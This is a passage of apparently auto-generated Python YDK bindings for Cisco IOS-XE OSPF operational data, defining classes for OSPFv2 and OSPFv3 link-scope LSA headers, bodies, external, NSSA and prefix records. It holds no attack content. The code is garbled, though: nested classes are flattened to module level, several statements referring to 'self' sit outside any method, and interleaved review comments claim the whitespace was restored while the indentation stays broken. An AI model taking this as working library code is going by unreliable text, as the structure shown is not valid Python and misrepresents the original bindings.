'network-mask'), ['str','str'])), ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ]) self.network_mask = None self.attached_router = [] self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Lsa.LsaBody.Network, ['network_mask', 'attached_router'], name, 
# NOTE(review): auto-generated ydk bindings; whitespace restored, logic untouched.
# Completes the _perform_setattr call begun on the previous source line.
                                                                       value)


class Ospfv2Link(Entity):
    # YANG list "ospfv2-link" (router-LSA link), keyed by (link-id, link-data);
    # nested under link-scope-lsa in the original model.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, self).__init__()

        self.yang_name = "ospfv2-link"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['link_id','link_data']
        self._child_classes = OrderedDict([("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology))])
        self._leafs = OrderedDict([
            ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
            ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])),
            ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
        ])
        self.link_id = None
        self.link_data = None
        self.type = None

        self.ospfv2_topology = YList(self)
        # Keyed list: both keys appear as predicates in the segment path.
        self._segment_path = lambda: "ospfv2-link" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link, ['link_id', 'link_data', 'type'], name, value)

    class Ospfv2Topology(Entity):
        # YANG list "ospfv2-topology" keyed by mt-id (per-topology link metric).
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, self).__init__()

            self.yang_name = "ospfv2-topology"
            self.yang_parent_name = "ospfv2-link"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = ['mt_id']
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
                ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
            ])
            self.mt_id = None
            self.metric = None
            self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Link.Ospfv2Topology, ['mt_id', 'metric'], name, value)


class Ospfv2Topology(Entity):
    # Same-named sibling list directly under link-scope-lsa (not under ospfv2-link).
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, self).__init__()

        self.yang_name = "ospfv2-topology"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        self._segment_path = lambda: "ospfv2-topology" + "[mt-id='" + str(self.mt_id) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2Topology, ['mt_id', 'metric'], name, value)


class Ospfv2External(Entity):
    # YANG list "ospfv2-external" keyed by mt-id (AS-external LSA data).
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, self).__init__()

        self.yang_name = "ospfv2-external"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['mt_id']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('mt_id', (YLeaf(YType.uint32, 'mt-id'), ['int'])),
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
        ])
        self.mt_id = None
        self.metric = None
        self.forwarding_address = None
        self.external_route_tag = None
        self._segment_path = lambda: "ospfv2-external" + "[mt-id='" + str(self.mt_id) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2External, ['mt_id', 'metric', 'forwarding_address', 'external_route_tag'], name, value)


class Ospfv2UnknownTlv(Entity):
    # YANG list "ospfv2-unknown-tlv" keyed by type: raw TLVs the decoder
    # does not recognise (type/length/value bytes).
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, self).__init__()

        self.yang_name = "ospfv2-unknown-tlv"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['type']
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
            ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
            ('value', (YLeafList(YType.uint8, 'value'), ['int'])),
        ])
        self.type = None
        self.length = None
        self.value = []
        self._segment_path = lambda: "ospfv2-unknown-tlv" + "[type='" + str(self.type) + "']"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv2UnknownTlv, ['type', 'length', 'value'], name, value)


class Ospfv3LsaVal(Entity):
    # YANG container "ospfv3-lsa-val": decoded OSPFv3 LSA (header + body).
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, self).__init__()

        self.yang_name = "ospfv3-lsa-val"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # OrderedDict literal continues on the next source line (chunk is line-mangled).
        self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header)), ("lsa-body", ("lsa_body",
# NOTE(review): auto-generated ydk bindings; whitespace restored, logic untouched.
# Completes Ospfv3LsaVal.__init__'s _child_classes literal begun on the previous line.
                        OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody))])
self._leafs = OrderedDict()

# Singleton child containers, wired for path resolution.
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header()
self.header.parent = self
self._children_name_map["header"] = "header"

self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv3-lsa-val"
self._is_frozen = True

def __setattr__(self, name, value):
    # No settable leafs on this container (empty allow-list).
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal, [], name, value)


class Header(Entity):
    # YANG container "header": OSPFv3 LSA id/options plus nested lsa-header.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, self).__init__()

        self.yang_name = "header"
        self.yang_parent_name = "ospfv3-lsa-val"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader))])
        self._leafs = OrderedDict([
            ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
            ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
        ])
        self.lsa_id = None
        self.lsa_hdr_options = Bits()

        self.lsa_header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader()
        self.lsa_header.parent = self
        self._children_name_map["lsa_header"] = "lsa-header"
        self._segment_path = lambda: "header"
        self._is_frozen = True

    # Body of this method continues on the next source line (chunk is line-mangled).
    def __setattr__(self, name, value):
# NOTE(review): auto-generated ydk bindings; whitespace restored, logic untouched.
# Body of Header.__setattr__ whose 'def' line precedes this chunk line.
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header, ['lsa_id', 'lsa_hdr_options'], name, value)


class LsaHeader(Entity):
    # YANG container "lsa-header": common LSA header fields (age/type/adv-router/...).
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, self).__init__()

        self.yang_name = "lsa-header"
        self.yang_parent_name = "header"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
            ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
            ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
            ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
            ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
            ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
        ])
        self.age = None
        self.type = None
        self.adv_router = None
        self.seq_num = None
        self.checksum = None
        self.length = None
        self._segment_path = lambda: "lsa-header"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)


class LsaBody(Entity):
    # YANG container "lsa-body": OSPFv3 LSA body with one child per LSA kind.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, self).__init__()

        self.yang_name = "lsa-body"
        self.yang_parent_name = "ospfv3-lsa-val"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # OrderedDict literal continues on the next source line (chunk is line-mangled).
        self._child_classes = OrderedDict([("network", ("network", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network)), ("prefix", ("prefix",
# NOTE(review): auto-generated ydk bindings; whitespace restored, logic untouched.
# Completes Ospfv3LsaVal.LsaBody.__init__'s _child_classes literal from the previous line.
                        OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix))])
self._leafs = OrderedDict([
    ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])),
    ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])),
])
self.lsa_flag_options = Bits()
self.lsa_body_flags = Bits()

# One singleton child container per OSPFv3 LSA body variant.
self.network = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network()
self.network.parent = self
self._children_name_map["network"] = "network"

self.prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"

self.ia_router = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter()
self.ia_router.parent = self
self._children_name_map["ia_router"] = "ia-router"

self.lsa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal()
self.lsa_external.parent = self
self._children_name_map["lsa_external"] = "lsa-external"

self.nssa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa()
self.nssa.parent = self
self._children_name_map["nssa"] = "nssa"

self.link_data = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData()
self.link_data.parent = self
self._children_name_map["link_data"] = "link-data"

self.ia_prefix = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix()
self.ia_prefix.parent = self
self._children_name_map["ia_prefix"] = "ia-prefix"
self._segment_path = lambda: "lsa-body"
self._is_frozen = True

def __setattr__(self, name, value):
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value)


class Network(Entity):
    # YANG container "network" under ospfv3-lsa-val/lsa-body.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, self).__init__()

        self.yang_name = "network"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])),
            ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])),
        ])
        self.attached_router = []
        self.lsa_net_options = Bits()
        self._segment_path = lambda: "network"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value)


class Prefix(Entity):
    # YANG container "prefix" under ospfv3-lsa-val/lsa-body.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    # Body of __init__ continues on the next source line (chunk is line-mangled).
    def __init__(self):
# NOTE(review): auto-generated ydk bindings; whitespace restored, logic untouched.
# Body of Prefix.__init__ whose 'def' line precedes this chunk line.
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, self).__init__()

        self.yang_name = "prefix"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])),
            ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])),
        ])
        self.metric = None
        self.ia_prefix = None
        self.ia_prefix_options = None
        self._segment_path = lambda: "prefix"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value)


class IaRouter(Entity):
    # YANG container "ia-router": inter-area router LSA body.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, self).__init__()

        self.yang_name = "ia-router"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])),
            ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])),
        ])
        self.metric = None
        self.destination_router_id = None
        self.lsa_ia_options = Bits()
        self._segment_path = lambda: "ia-router"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value)


class LsaExternal(Entity):
    # YANG container "lsa-external": AS-external LSA body plus flags child.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, self).__init__()

        self.yang_name = "lsa-external"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags))])
        self._leafs = OrderedDict([
            ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
            ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
            ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
            ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
        ])
        self.metric = None
        self.referenced_ls_type = None
        self.external_prefix = None
        self.external_prefix_options = None
        self.forwarding_address = None
        self.external_route_tag = None
        self.referenced_link_state_id = None

        self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags()
        self.flags.parent = self
        self._children_name_map["flags"] = "flags"
        self._segment_path = lambda: "lsa-external"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value)

    class Flags(Entity):
        # YANG container "flags" under lsa-external: single e-flag boolean.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, self).__init__()

            self.yang_name = "flags"
            self.yang_parent_name = "lsa-external"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
            ])
            self.e_flag = None
            self._segment_path = lambda: "flags"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LsaExternal.Flags, ['e_flag'], name, value)


class Nssa(Entity):
    # YANG container "nssa": wraps the lsa-nssa-external container.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, self).__init__()

        self.yang_name = "nssa"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal))])
        self._leafs = OrderedDict()

        self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal()
        self.lsa_nssa_external.parent = self
        self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external"
        self._segment_path = lambda: "nssa"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa, [], name, value)

    class LsaNssaExternal(Entity):
        # YANG container "lsa-nssa-external": NSSA external LSA body plus flags child.
        _prefix = 'ospf-ios-xe-oper'
        _revision = '2018-02-01'

        def __init__(self):
            super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, self).__init__()

            self.yang_name = "lsa-nssa-external"
            self.yang_parent_name = "nssa"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags))])
            self._leafs = OrderedDict([
                ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])),
                ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
                ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])),
                ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])),
                ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])),
                ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])),
                ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
            ])
            self.metric = None
            self.referenced_ls_type = None
            self.external_prefix = None
            self.external_prefix_options = None
            self.forwarding_address = None
            self.external_route_tag = None
            self.referenced_link_state_id = None

            self.flags = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags()
            self.flags.parent = self
            self._children_name_map["flags"] = "flags"
            self._segment_path = lambda: "lsa-nssa-external"
            self._is_frozen = True

        def __setattr__(self, name, value):
            # Call continues on the next source line (chunk is line-mangled).
            self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name,
# NOTE(review): auto-generated ydk bindings; whitespace restored, logic untouched.
# Completes the _perform_setattr call begun on the previous source line.
                                                                       value)


# Nested under Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal in the original model.
class Flags(Entity):
    # YANG container "flags" under lsa-nssa-external: single e-flag boolean.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__()

        self.yang_name = "flags"
        self.yang_parent_name = "lsa-nssa-external"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])),
        ])
        self.e_flag = None
        self._segment_path = lambda: "flags"
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value)


class LinkData(Entity):
    # YANG container "link-data": OSPFv3 link-LSA body.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, self).__init__()

        self.yang_name = "link-data"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
            ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
            ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
            ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
        ])
        self.rtr_priority = None
        self.link_local_interface_address = None
        self.num_of_prefixes = None
        self.lsa_id_options = Bits()
        self._segment_path = lambda: "link-data"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Argument list continues on the next source line (chunk is line-mangled).
        self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData, ['rtr_priority',
# NOTE(review): auto-generated ydk bindings; whitespace restored, logic untouched.
# Completes LinkData.__setattr__'s argument list begun on the previous line.
                              'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value)


class IaPrefix(Entity):
    # YANG container "ia-prefix": intra-area-prefix LSA body.
    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__()

        self.yang_name = "ia-prefix"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
